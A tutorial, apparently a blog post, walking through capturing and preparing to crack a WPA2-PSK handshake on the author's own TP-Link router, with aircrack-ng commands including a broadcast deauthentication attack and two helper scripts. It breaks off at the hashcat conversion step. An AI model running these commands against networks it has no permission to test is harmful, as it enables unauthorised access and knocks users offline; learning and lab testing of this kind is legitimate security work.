Part 1 – Background and Prerequisites
WPA2, or WiFi Protected Access 2, is still the most widely deployed encryption standard on wireless networks. It was ratified in 2004 and as such is a mature and robust technology that is only now starting to be replaced by the stronger WPA3 protocol. Cracking a WPA2 network isn’t easy. In the common pre-shared-key configuration (WPA2-PSK, what home routers use) it comes down to capturing one client’s authentication handshake and then guessing the passphrase offline, so how feasible it is depends on the strength of that passphrase and on the attacker’s hardware.
In this tutorial, I will show you how to reliably crack a WPA2 network with a weak passphrase, often in under an hour.
Defining Vulnerability in Wi-Fi Encryption
As in nearly every security scenario, the stronger a network password is, the more difficult it will be to crack. In 2023, home routers typically ship with their default ESSID and password printed on the unit, and the password will often be a mix of letters, numbers and special characters at least 12 characters long. As little as five years ago, this was not the case. TP-Link, for example, shipped their routers with an 8-character password consisting of numbers only.
Many (most?) people will never change their routers from their default settings, so it is completely reasonable to assume there are an enormous number of households with, let’s say, 10-year-old routers still using that default string of 8 numbers. Not good!
With my very modest PC, I can crack a password of this strength in about 35 minutes. An 8-digit numeric password has only 10^8 (100 million) possible values, and WPA2 guessing speed is limited by the PBKDF2 key derivation, so a few tens of thousands of guesses per second on a modest GPU is enough to exhaust them in well under an hour. To keep things in perspective, trying to crack a 12-character password that contains a mix of characters returns an estimated time in years rather than minutes. Moral of the story – use strong passwords!
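The minutes-versus-years comparison above is just keyspace divided by guessing rate. The following script is an added example, not part of the original tutorial: it expands a hashcat mask (the `-a 3` syntax hashcat uses for brute force, where `?d` is a digit, `?a` any printable ASCII character, and so on) into a candidate count and turns that into a worst-case time. The 50,000 guesses per second used in the demo is an assumed figure standing in for a modest GPU; substitute the H/s that hashcat reports for your own card.

```python
"""
Added example (not from the original tutorial): estimate how long an exhaustive
hashcat mask attack on a WPA2-PSK handshake takes. RATE is an assumption.
"""
import string

# hashcat built-in charsets; ?s is the 33 printable ASCII punctuation characters including space
CHARSETS = {
    "?l": string.ascii_lowercase,
    "?u": string.ascii_uppercase,
    "?d": string.digits,
    "?s": " " + string.punctuation,
}
CHARSETS["?a"] = CHARSETS["?l"] + CHARSETS["?u"] + CHARSETS["?d"] + CHARSETS["?s"]   # 95 characters


def mask_keyspace(mask):
    """Number of candidates a hashcat mask (-a 3 syntax) expands to.
    '?x' tokens expand to their charset, '??' is a literal '?', anything else is a literal."""
    total, i = 1, 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            token = mask[i:i + 2]
            if token != "??" and token not in CHARSETS:
                raise ValueError(f"unknown charset {token}")
            total *= 1 if token == "??" else len(CHARSETS[token])
            i += 2
        else:
            i += 1                      # literal character: exactly one choice
    return total


def seconds_to_exhaust(mask, rate_hps):
    """Worst-case wall-clock seconds to try every candidate at rate_hps guesses per second."""
    return mask_keyspace(mask) / rate_hps


def human_duration(seconds):
    for unit, size in (("years", 365 * 86400), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:.1f} seconds"


if __name__ == "__main__":
    RATE = 50_000                       # assumed WPA2 (PBKDF2-SHA1) rate for a modest GPU
    for label, mask in (("8 digits (old TP-Link default)", "?d" * 8),
                        ("12 mixed printable ASCII", "?a" * 12),
                        ("fixed prefix + 6 digits", "TP?d?d?d?d?d?d")):
        print(f"{label:32} {mask_keyspace(mask):>26,} candidates  "
              f"{human_duration(seconds_to_exhaust(mask, RATE))}")
```

Run it with no arguments to print the three comparisons; the 8-digit mask comes out at roughly half an hour at the assumed rate, while the 12-character `?a` mask is in the hundreds of billions of years, which is why the rest of this tutorial targets the old numeric default rather than a modern printed password.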
Getting Started
- Kali Linux VM running on VMWare Player
- USB WiFi adapter that supports monitor mode
- Windows PC with discrete graphics card and hashcat installed
How do I install VMWare Player and Kali Linux?
Although this is a bit beyond the scope of this tutorial, I suggest using VMWare Player over Virtualbox because it handles assigning USB devices to the virtual machine seamlessly. That process is a bit more complex in Virtualbox.
You can download and install VMWare Player here – using all the defaults during the installation will be fine. Make sure your storage drive has a minimum of 15GB of empty space.
OffSec is nice enough to provide the community with pre-built Kali Linux virtual machines for several hypervisors. Download the VMWare version here. Because this file is downloaded in .7z format, which Windows does not handle natively, you will need to first install 7-Zip to extract the Kali files.
With the Kali files extracted, open up VMWare Player, choose to open an existing virtual machine, and select the .vmx file in the extracted folder. Voila, you’re ready to go!
Does my Wi-Fi card support “monitor mode”?
Spoiler: probably not. Though any commercially available computer purchased in the last 10-15 years includes a wireless network interface, most only support connecting to a wireless access point and exchanging data — this is called “managed mode.” You need a card that can be switched to listen to all WiFi traffic on a channel (“monitor mode”) and that can also inject frames, which the deauthentication step later in this tutorial depends on; many built-in chipsets manage one but not the other. The quickest way to get both is to simply buy a USB WiFi adapter that you know will work. They are cheap and reliable and can be assigned to your Kali VM as soon as you plug it in (if you are using VMWare Player). Here is a list of adapters that cyber professionals often turn to.
You can certainly try the commands below on your built-in WiFi card – some do work. I’m typing this right now on a Raspberry Pi 4+, which does support monitor mode. But you’ll probably just want to buy an adapter. I went with this one and it works great!
Do I really need a PC with a discrete graphics card?
No, not really. But the process we’ll use to crack the network password is much, much faster with a discrete graphics card than without. If you try this on a 2015 Celeron laptop with integrated graphics, you are not going to enjoy the experience.
You will need hashcat on your host system. This is easy to do in Windows; in fact, there is no installation at all. Download the hashcat binaries from here and extract the folder to a place you can find later. This is also a .7z file, by the way.
At this point, you are ready to get started on the cracking process. Fire up your Kali VM and continue on to Part 2 when you’re ready.
Process
Startup your Kali VM and make sure your USB Wifi adapter is assigned to it. I use the VMWare Player to run Kali, in part because assigning USB devices to the VM is super simple. Once Kali is running, plug in the adapter and VMWare will pop up a window asking if you want to assign the device to your host OS (no) or the VM (yes).
Check the current network configuration with the Wireless Tools package by typing iwconfig (on distributions that no longer ship Wireless Tools, iw dev shows the same information). You should see something like the following screenshot. Note that it reads “Mode:Managed” and the adapter’s name is “wlan0.”
For much of this tutorial, we will use the aircrack-ng suite of tools. These are installed by default on Kali, but can be installed on any Linux distribution using the package manager. Fire up airmon-ng to check for and kill any interfering processes (NetworkManager, wpa_supplicant and the like, which would otherwise keep resetting the adapter into managed mode; any WiFi connection the adapter itself has will drop):
sudo airmon-ng check kill
The result will look similar to this:
You’re ready now to put your WiFi adapter into monitor mode. Make sure to replace “wlan0” below with whatever the name of your adapter is (above, the result of the iwconfig command).
sudo airmon-ng start wlan0
You can check to make sure this was successful by issuing another iwconfig command, and the result should look similar to the screenshot below. Note that the adapter now says “Mode:Monitor” and the adapter name has been changed to “wlan0mon.”
We can now use the adapter to scan for WLANs in range with the following command:
sudo airodump-ng wlan0mon
As you can see below, this shows a lot of useful information about the WLANs that happen to be in range of the adapter.
In this case, the network that I am targeting is “TP-LINK_F3D2.” This is the vulnerable WPA2-protected network that I set up at my house with a TP-LINK router.
OK, this next part should go without saying, but please don’t use this process on a network that you don’t own yourself or have EXPLICIT permission to work with. These are powerful tools and it may be tempting to take a laptop to a coffee shop or library and see what havoc can be wreaked, but that is both unethical and illegal. This tutorial and others like it exist for educational purposes only: learn how to do this so that you are ready for a job that requires it (penetration testing, military, law enforcement, etc.). Back to the fun stuff…
This airodump command is useful, but we need to restrict the display to our target network only. Write down the BSSID (this is the access point’s MAC address), channel number, and ESSID of your target network, then type in the following command, replacing my values with yours:
sudo airodump-ng -w TPLink1 -c 9 --bssid EC:08:6B:2B:F3:D2 wlan0mon
Here -w sets the name prefix for the capture files; airodump writes every frame it sees for this network to them from the moment it starts, and that is where the 4-way handshake between a client and the router will land. We’re also pinning airodump to the target BSSID and channel with --bssid and -c, which stops the adapter from hopping between channels; it has to sit on the AP’s channel to catch the handshake. The result will look like this:
This is where things will get a bit tricky. As you can see above, I only have one client on the TP-LINK network because I set up this network specifically for this tutorial, but if you are cracking your own home network, you will probably see many clients appear under “STATION.” If nothing appears after a minute or so, you will need to get some WiFi-enabled device onto the target network. Use a phone, tablet, another PC, etc. Once it’s connected, its MAC address will appear under STATION. Go ahead and connect and disconnect it a few times; you’ll see that line appear and disappear as you do.
While your device is signed into the target network, open a new terminal window and issue the following command (again, make sure you replace my BSSID and adapter name with yours):
sudo aireplay-ng --deauth 0 -a EC:08:6B:2B:F3:D2 wlan0mon
This command sends repeated “deauthentication” frames, spoofed as coming from the router, to every client on the network and kicks them off. The count 0 means aireplay keeps sending until you press Ctrl-C, so stop it after a few seconds (or use a small count such as --deauth 5); a client that is being deauthenticated continuously never gets far enough to finish reconnecting. You can also add -c followed by the STATION MAC address to target a single client instead of broadcasting. Deauthentication works because WPA2 does not protect management frames unless 802.11w is enabled, which is one of the things WPA3 fixes. Now, your iPhone or whatever you have connected to the target network doesn’t like to be kicked off, so it will immediately re-authenticate and perform a fresh 4-way handshake to get back on. Return to the first terminal window. Within a few seconds, the top line of the airodump display should read “WPA handshake:” followed by the BSSID. If so, you’re in business!
Airodump will have saved some files to the directory you ran it from, named according to the -w argument you specified in the earlier command – mine was TPLink1. In that case, the file that I need to take note of is TPLink1-01.cap, as shown below. Write down the name of the .cap file that was created on your system; it contains the captured frames, including the EAPOL handshake messages that we are going to crack.
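The “WPA handshake” banner only tells you that airodump saw some EAPOL-Key traffic; what hashcat actually needs is message 2 of the handshake (the client’s SNonce and MIC) together with the AP’s ANonce from message 1 or 3 of the same exchange. The script below is an added example, not from the original tutorial, that walks the .cap file the way a conversion tool does: it reads classic pcap records, strips the radiotap header, picks out 802.11 data frames carrying EAPOL-Key, classifies each by its Key Information bits, and reports which client has a matching M1+M2 (equal replay counters) or M2+M3 pair. The sample capture at the bottom is built in code and is not real traffic; the station MAC in it is made up, and the BSSID is the one from this tutorial. Point it at your own file with `python3 check_handshake.py TPLink1-01.cap` (file name assumed).

```python
"""
Added example (not part of the original tutorial): decide whether a pcap written by
airodump-ng holds a crackable WPA2 4-way handshake. Standard library only; the
sample capture at the bottom is constructed here and is NOT a real capture.
"""
import struct
from collections import defaultdict

LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")   # LLC/SNAP header with EtherType 0x888E
KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 0x0040, 0x0080, 0x0100, 0x0200   # Key Information bits


def classify_message(key_info):
    """Map EAPOL-Key Key Information bits to handshake message 1-4 (None if unrecognised)."""
    ack, mic = bool(key_info & KI_ACK), bool(key_info & KI_MIC)
    if ack and not mic:
        return 1                                  # M1: AP sends ANonce
    if ack and mic and key_info & KI_INSTALL:
        return 3                                  # M3: AP confirms, carries the GTK
    if mic and not ack:
        return 4 if key_info & KI_SECURE else 2   # M2: SNonce + MIC (the one hashcat cracks); M4: final ack
    return None


def parse_eapol_key(frame):
    """Return (bssid, station, msg_no, replay_counter) for an 802.11 data frame carrying
    EAPOL-Key, or None for any other frame."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 2:          # frame type 2 = data
        return None
    hdr_len = 26 if frame[0] & 0x80 else 24                    # QoS-data subtype adds 2 bytes
    to_ds, from_ds = frame[1] & 0x01, frame[1] & 0x02
    addr1, addr2 = frame[4:10], frame[10:16]
    if from_ds and not to_ds:
        bssid, station = addr2, addr1                          # AP -> client
    elif to_ds and not from_ds:
        bssid, station = addr1, addr2                          # client -> AP
    else:
        return None                                            # IBSS/WDS frames not handled here
    body = frame[hdr_len:]
    if not body.startswith(LLC_SNAP_EAPOL):
        return None
    eapol = body[8:]
    if len(eapol) < 17 or eapol[1] != 3 or eapol[4] not in (2, 254):   # type 3 = Key; RSN/WPA descriptor
        return None
    key_info, = struct.unpack(">H", eapol[5:7])
    replay, = struct.unpack(">Q", eapol[9:17])
    msg = classify_message(key_info)
    return None if msg is None else (bssid, station, msg, replay)


def pcap_frames(data):
    """Yield raw 802.11 frames from classic pcap bytes (link type 105 = 802.11, 127 = radiotap)."""
    endian = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(data[:4])
    if endian is None:
        raise ValueError("not a classic pcap file")
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack(endian + "IIII", data[off:off + 16])[2]
        pkt = data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if linktype == 127:
            pkt = pkt[struct.unpack("<H", pkt[2:4])[0]:]          # strip variable-length radiotap header
        elif linktype != 105:
            continue
        yield pkt


def find_handshakes(data):
    """Return {(bssid, station): {message numbers seen}} for every client whose capture is
    crackable: M1+M2 with equal replay counters, or M2+M3 with M3's counter one higher."""
    seen = defaultdict(dict)                                   # (bssid, sta) -> {msg_no: replay counter}
    for frame in pcap_frames(data):
        parsed = parse_eapol_key(frame)
        if parsed:
            bssid, sta, msg, replay = parsed
            seen[(bssid, sta)][msg] = replay
    usable = {}
    for pair, msgs in seen.items():
        m1m2 = 1 in msgs and 2 in msgs and msgs[1] == msgs[2]
        m2m3 = 2 in msgs and 3 in msgs and msgs[3] == msgs[2] + 1
        if m1m2 or m2m3:
            usable[pair] = set(msgs)
    return usable


# --- constructed sample capture (no real traffic) ---------------------------------------
def build_eapol_frame(bssid, station, msg, replay):
    """Build a minimal radiotap + 802.11 data + EAPOL-Key frame for handshake message `msg`."""
    key_info = {1: 0x008A, 2: 0x010A, 3: 0x13CA, 4: 0x030A}[msg]   # typical CCMP handshake values
    from_ap = msg in (1, 3)
    fc = b"\x08\x02" if from_ap else b"\x08\x01"               # data frame, FromDS or ToDS
    addrs = station + bssid + bssid if from_ap else bssid + station + bssid
    dot11 = fc + b"\x00\x00" + addrs + b"\x00\x00"              # FC, duration, addr1-3, seq ctrl
    key = bytes([2]) + struct.pack(">HHQ", key_info, 16, replay) + bytes(80) + b"\x00\x00"
    eapol = bytes([2, 3]) + struct.pack(">H", len(key)) + key  # version 2, type Key, body length
    return struct.pack("<BBHI", 0, 0, 8, 0) + dot11 + LLC_SNAP_EAPOL + eapol


def build_pcap(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 127)   # link type 127 = radiotap
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f
    return out


AP = bytes.fromhex("ec086b2bf3d2")          # BSSID from the tutorial
STA = bytes.fromhex("020000aabbcc")         # made-up, locally administered client MAC
SAMPLE_PCAP = build_pcap([
    build_eapol_frame(AP, STA, 1, 5),       # stale M1 whose M2 was never captured
    build_eapol_frame(AP, STA, 1, 7),
    build_eapol_frame(AP, STA, 2, 7),
    build_eapol_frame(AP, STA, 3, 8),
    build_eapol_frame(AP, STA, 4, 8),
])

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    for (bssid, sta), msgs in find_handshakes(data).items():
        print(f"{bssid.hex(':')} <-> {sta.hex(':')}: messages {sorted(msgs)} -> crackable")
```

If your own capture prints nothing, the usual causes are a deauth that ran so long the client never completed message 2, or the adapter not sitting on the AP’s channel; go back, stop aireplay after a few seconds, and let the client reconnect cleanly.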
Preparing Hashcat
We are going to use the program hashcat to do the rest of the work for us at this point. First, we must convert the .cap file mentioned above into a file that hashcat understands. For this, we’ll use a helper binary from the hashcat-utils package that exists specifically for that purpose. (Recent hashcat releases deprecate the .hccapx format and its mode 2500 in favour of the hcxpcapngtool converter and mode 22000; the steps below still work on the hashcat version used here, but if your hashcat complains about the format, that is why.) Here is the command I used:
sudo /usr/share/hashcat-utils/cap2hccapx.bin TPLink1-01.cap wpa2.hccapx
The binary we need is called cap2hccapx.bin. In my Kali VM, that’s located at /usr/share/hashcat-utils, but yours may be in a different location. Check to see if it’s in the usual location:
ls -a /usr/share/hashcat-utils
If you get an error or nothing is in that directory, you will need to search the file system for that .bin. If you happen to be following along on Ubuntu, for example, this utility is in a different location. You can always run which hashcat to find out whether the main program is installed and on your PATH; note that cap2hccapx ships in the separate hashcat-utils package, so having hashcat itself does not guarantee the converter is present.
The rest of the command above is simply the .cap file to be converted, and the name of the .hccapx file we’ve chosen. After running, you should see this (the number of handshakes will vary):